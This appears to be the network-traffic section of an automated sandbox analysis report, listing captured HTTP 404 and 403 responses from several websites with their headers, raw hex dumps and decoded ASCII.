Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-234.ec2.internalX-Request-Id: 805ce8b9-08e2-4e8c-83e1-17b6ee35516eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:50 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://derrickandbriggs.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 32 30 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 65 72 72 69 63 6b 61 6e 64 62 72 69 67 67 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6b 61 6e 64 69 6e 73 6b 79 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 32 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 33 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 34 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 44 65 72 72 69 63 6b 20 26 61 6d 70 3b 20 42 72 69 67 67 73 2c 20 4c 4c 50 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 7
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-165.ec2.internalX-Request-Id: 3afde26e-14a5-4db6-b41e-bc49882a39f5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276091.3121709925280112277Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalnZCKOJV3ikusuy8uWMJmMugTMZw2nlpXujg3R2m5DXfsTf0Hk8TJ3ijVqdUOr14xg==,2UNV7KOq4oGjA5+PKsX47Ad3BAkeAb9lWxcyN70+/DFYgeUJqUXtid+86vZww+nL,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,c2NmS8zFFiMMSZsKYWKS96LADve3hkb6YcfzdP1unZI=,WDMzHiyOL7uW518fW2ByrxYm7Hy0IxbPwWPdSZ00JGIuGGyTjOJT2bBDFj9QbaUIfL/RERtnkwYNR6ehP9dODg==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-104.ec2.internalX-Request-Id: 9bfc2e0a-1d01-4838-89f0-a4c47bc5bbb0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Connection: keep-alivex-wix-request-id: 1703276091.4901709925280212277Age: 0Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLsrnLBntwLRXccxrbxQ/m1sa0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalpGMksnd3IwBAt8vQj5PWppYzrBY4ZCZ7qfk0aaye0TuqG9EI0zcyI4825B9mshKCg==,2UNV7KOq4oGjA5+PKsX47HWShCS4DzdxDWECJm/3qSgfbJaKSXYQ/lskq2jK6SGP,S+3YDkrdjZ6isF/aTRkOdUjmz5YjnwZx7K9uZU5HfPQ=,q4Lmhk3LuY9WzSLOm0WLKV0xpIl3PUTIhAv9hKeMcO0=,WDMzHiyOL7uW518fW2Byr06xHPCK537k6EVzpMSs4DH99KqBTwExals4cOXLszKDtqhJvaMlJuqJm4JppQlSfA==Vary: Accept-EncodingX-Content-Type-Options: nosniffContent-Encoding: gzipTransfer-Encoding: chunkedData Raw: 34 32 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 56 df 6f db 36 10 7e cf 5f c1 e8 45 2d 10 8a 71 d6 61 69 26 05 e8 b2 0c cb cb 30 6c 28 b0 a1 28 0a 5a 3c 5b 4c 28 52 25 29 ff 40 d7 ff 7d 77 94 ec 39 71 b0 c6 89 1f 6c f3 c8 bb fb be bb 23 ef 18 2b 8f 39 67 8c f3 cb a3 a3 f2 58 b9 3a ae 3b 60 4d 6c cd 25 ae 39 3f 62 f8 a1 dd 92 64 cc ce b9 ec ba 2a 5b ea d5 b5 f7 ce ff 2e e7 10 de 75 5d 46 07 40 aa 4b 3c 5f b6 10 25 b3 b2 85 2a 5b 68 58 76 ce c7 8c d5 ce 46 b0 91 54 55 6c 2a 05 0b 5d 03 4f 8b 13 6d 75 d4 d2 f0 50 4b 03 d5 e4 84 b5 72 a5 db be fd 4f d0 07 f0 69 25 a7 78 c2 3a f4 b7 71 54 37 d2 07 40 c3 7d 9c f1 f3 9d 8d 26 c6 8e c3 e7 5e 2f aa ec 2f fe fe 1d bf 72 6d 27 a3 46 0b 3b 70 6e ae 2b 50 73 18 f4 a2 8e 06 88 e4 54 5b 55 65 79 87 f4 3e 25 61 ce fe 61 d1 4b 1b 8c 8c 78 b8 14 49 fa 90 ae 82 50 7b dd 45 ed ec 8e 8b 1d 4c 07 44 65 4f cb bb a9 8b 61 c7 ae 75 88 12 56 27 cc ba 99 33 c6 2d 07 95 6d 42 29 75 a5 d1 f6 8e 51 52 ab 4c b7 48 47 74 76 9e b1 c6 c3 ac ca 84 58 2e 97 05 e6 b2 a8 5d 2b 66 12 53 e2 6c 81 5f 19 f3 60 aa 2c 34 98 ba ba 8f 8c e4 7b c6 07 d3 1b 4b 21 62 68 eb a2 93 5e 86 e8 3c 7a 4a 46 31 6f 94 e8 20 62 a3 bd e2 b8 1d d7 62 86 b5 10 c4 af 60 16 80 3a 32 ad 7f 91 35 6a 04 e4 37 b8 8e 6b 03 a1 01 c0 d2 19 d0 47 58 45 91 0e 88 14 f6 1d 9a 03 92 3d bd a7 42 c3 00 f0 ae 9f 1a 5d 8b 49 f1 c3 e4 6d 71 2a 42 72 2f 80 6a 1c 41 63 91 8f a2 04 f1 be ff 52 0c 95 5f 4e 9d 5a 33 23 Data Ascii: 427Vo6~_E-qai&0l((Z<[L(R%)@}w9ql#+9gX:;`Ml%9?bd[.u]F@K<_%[hXvFTUl]OmuPKrOi%x:qT7@}&^//rm'F;pn+PsT[Uey>%aaKxIP{ELDeOauV'3-mB)uQRLHGtvX.]+fSl_`,4{K!bh^<zJF1o bb`:25j7kGXE=B]ImqBr/jAcR_NZ3#
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 17008X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: 2FA2Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 31 63 63 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 22 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 6d 65 64 69 75 6d 2d 74 65 78 74 22 3e 54 68 69 73 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 74 72 79 69 6e 67 20 74 6f 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheLast-Modified: Thu, 26 Jul 2007 15:09:38 GMTETag: "8d7ff8d4-2b5-4362c03e5f083"Accept-Ranges: bytesContent-Length: 693Content-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTServer: ApacheX-Powered-By: PHP/8.1.26Cache-Control: no-cache, privateVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 39 34 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 74 6d 6c 0d 0a 20 20 20 20 6c 61 6e 67 3d 22 65 6e 20 22 0d 0a 20 20 20 20 64 61 74 61 2d 74 65 78 74 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 0d 0a 20 20 20 20 63 6c 61 73 73 3d 22 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 49 73 6d 61 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 63 73 73 2f 63 75 73 74 6f 6d 2f 6c 6f 61 64 65 72 2e 63 73 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 6a 73 2f 63 6f 72 65 2f 73 63 72 69 70 74 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 76 65 6e 64 6f 72 73 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 75 69 2f 70 72 69 73 6d 2e 6d 69 6e 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72 6c 64 2e 63 6f 6d 2f 76 65 6e 64 6f 72 73 2f 63 73 73 2f 65 78 74 65 6e 73 69 6f 6e 73 2f 73 77 65 65 74 61 6c 65 72 74 32 2e 6d 69 6e 2e 63 73 73 22 3e 0d 0a 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 73 6d 61 77 6f 72
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-105.ec2.internalX-Request-Id: 327b011f-8963-4b3b-babe-60dd97585fe0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 22 Dec 2023 20:14:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTSet-Cookie: __cf_bm=J4Nue95JM1dINw3TemoQc5CpWXnpgaCYdJn2jNeEsfg-1703276091-1-AaCSyAWo451NgKGc5EkQiFgzNEHTFBBdToU/j54V8tffTZuD64wtqdLMXqu2Z22r/F7Hh6Lzzdeto9I0KyVhzlM=; path=/; expires=Fri, 22-Dec-23 20:44:51 GMT; domain=.liberty25.org; HttpOnly; SameSite=NoneVary: Accept-EncodingServer: cloudflareCF-RAY: 839b08953e265c76-MIAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 37 63 63 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 c4 fb c7 0e c6 4a b2 26 06 ae 25 40 ef 70 54 ab 6e b0 8f e8 5d dd 5b 17 43 ef bd e7 8e 9e fc e9 bd 11 e6 dd 07 e7 94 1a 98 d5 08 5a 4d 2e 18 91 e1 68 90 19 c8 f8 92 f9 9f ff 3b 6f 71 7e 62 0b 7f b4 c7 38 fc d7 ff f6 bf fe e7 ff fe e7 9f 7f ec d9 55 95 7f d4 db 3c fe 71 6e c3 bf fe 1b 04 c1 d8 7f cf f2 f9 3c fe d9 4d 47 b5 4d d5 f1 c7 9f 7f fe 65 fd b7 d7 7f b6 55 56 fe d7 7f 8e d5 91 fd d1 1e c7 f2 67 b5 9e dd f5 af 7f 70 f3 74 54 d3 f1 a7 ff 2e d5 3f fe 28 fe dd fb d7 3f 8e ea 39 c0 bf 1c ff e3 8f a2 cd b6 bd 3a fe 15 f8 e2 9f d4 3f fe eb 7f fb 5f ff f8 e3 8f 3f fe 7d fd 77 b8 29 1b ab 7f fd e3 ea aa 7b 99 b7 e3 ff 2b c8 dd 95 47 fb af b2 ba ba a2 fa f3 ef ce ff f8 a3 9b ba a3 cb 86 3f f7 22 1b aa 7f c1 7f c5 fb 5f fe 97 ff 3c ba 63 a8 fe 8b 1b e6 b3 ac 87 6c ab fe 80 21 08 fa 43 d8 b6 79 fb 4f f0 df ca bf ed 86 6e ea ff d8 aa e1 5f ff 58 b6 aa 98 a7 a9 2a 8e 7f fc d1 6e 55 fd af 7f fc f5 56 fb 3f 41 b0 9e a7 63 ff 3f 9a 79 6e 86 2a 5b ba fd ff 28 e6 11 fc c7 ff 63 ff fd c8 8e ae f8 b7 f3 1f c5 36 ef fb bc 75 4d 37 fd eb 1f ff 57 ac fd 78 87 ea bf fe 5f 7f 99 ff 59 67 45 f5 7f fe cd 95 dd be 0c d9 fb cf fd ce 96 ff f8 bf 74 63 37 bc ff d4 b3 63 fe b7 e0 6f c7 7f 4e f3 36 66 c3 bf 25 77 d5 35 ed f1 4f 0c 82 fe 63 df 8a 7f 9e db f0 df ca ec c8 fe f9 97 12 bc e7 ba 46 fe 23 cf f6 8a c0 fe 47 09 d1 92 d1 30 2c f3 77 3b 0c 86 81 fe e6 04 dc 61 18 66 43 19 46 60 fe 7f 35 09 13 4e 99 6b a4 84 e1 58 96 15 0c 6e 29 8d 1e a1 f4 88 61 58 b3 51 7a 06 13 46 96 63 c4 d6 6d e4 a6 65 f2 9a e5 7e f3 f2 3a e6 20 53 ae a3 c9 0b f5 d6 15 74 fb 5c 3f ac 48 9e 33 0e 77 09 fc 85 ca 9b Data Ascii: 